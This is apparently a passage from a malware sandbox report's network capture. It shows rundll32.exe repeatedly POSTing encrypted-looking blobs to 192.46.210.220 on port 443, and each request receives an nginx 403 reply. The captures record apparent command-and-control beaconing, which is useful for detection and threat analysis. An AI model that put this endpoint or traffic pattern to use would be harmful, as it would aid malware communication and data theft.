                                                                                                      2021-10-28 02:55:00 UTC266OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:00 UTC276INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      55192.168.2.350030192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:00 UTC271OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:00 UTC271OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:01 UTC276INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      56192.168.2.350037192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:04 UTC276OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:04 UTC276OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:04 UTC286INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      57192.168.2.350038192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:04 UTC281OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:04 UTC281OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:04 UTC286INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      58192.168.2.350044192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:09 UTC286OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:09 UTC286OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:10 UTC296INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      59192.168.2.350046192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:09 UTC291OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:09 UTC291OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:10 UTC296INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.349766192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:53:25 UTC29OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:53:25 UTC29OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:53:26 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:53:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      60192.168.2.350052192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:13 UTC296OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:13 UTC296OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:13 UTC306INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      61192.168.2.350054192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:13 UTC301OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:13 UTC301OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:14 UTC306INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:14 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      62192.168.2.350060192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:17 UTC306OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:17 UTC306OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:17 UTC316INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      63192.168.2.350062192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:17 UTC311OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:17 UTC311OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:18 UTC316INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      64192.168.2.350068192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:20 UTC316OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:20 UTC316OUTData Raw: 6b 46 df dd 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: kF$WZOlK#DQL1hK(oN*+A*mc0k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:21 UTC325INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      65192.168.2.350070192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:21 UTC321OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4802
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:55:21 UTC321OUTData Raw: f5 29 ae 6a 10 0c 24 ac 57 b0 5a a3 4f 6c 4b 9c b5 a2 23 ad fb af a2 44 06 10 db 9a de 51 92 4c a3 a7 e8 31 68 04 8c b2 cd aa a3 bd d3 4b 9f 8d fe e6 28 6f 90 0d 1c 4e 0f 2a 8d 08 2b 41 2a f6 6d fd 95 04 15 f1 63 91 09 eb 8c 30 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: )j$WZOlK#DQL1hK(oN*+A*mc0kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:55:22 UTC326INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:55:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      66192.168.2.350076192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:55:24 UTC326OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4814
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
